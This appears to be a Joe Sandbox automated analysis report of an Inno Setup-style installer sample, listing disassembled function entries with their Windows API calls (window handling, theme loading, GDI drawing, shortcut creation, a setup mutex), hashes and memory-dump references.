                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                            • String ID:
                                                                                            • API String ID: 649377781-0
                                                                                            • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                            • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID:
                                                                                            • API String ID: 568898626-0
                                                                                            • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                            • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureIconic
                                                                                            • String ID:
                                                                                            • API String ID: 2277910766-0
                                                                                            • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                            • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0042419B
                                                                                              • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                              • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                              • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2671590913-0
                                                                                            • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                            • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                            • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                            • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                            • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                            • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                            • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                            • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                            • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                            • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                            • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                            • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                            • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                            • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2982243621.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2982222276.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2982266740.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2982243621.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2982222276.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2982266740.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                              • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                            • API String ID: 1968650500-2910565190
                                                                                            • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                            • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                            • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                            • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041CA40
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                            • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                            • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                            • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                            • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                            • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                            • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                            • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                            • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                            • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                            • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                            • String ID:
                                                                                            • API String ID: 269503290-0
                                                                                            • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                            • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                            • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                            Strings
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                            • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                            • IPersistFile::Save, xrefs: 00456962
                                                                                            • {pf32}\, xrefs: 0045671E
                                                                                            • CoCreateInstance, xrefs: 004566AF
                                                                                            • IPropertyStore::Commit, xrefs: 004568E3
                                                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance$FreeString
                                                                                            • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                            • API String ID: 308859552-2363233914
                                                                                            • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                            • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
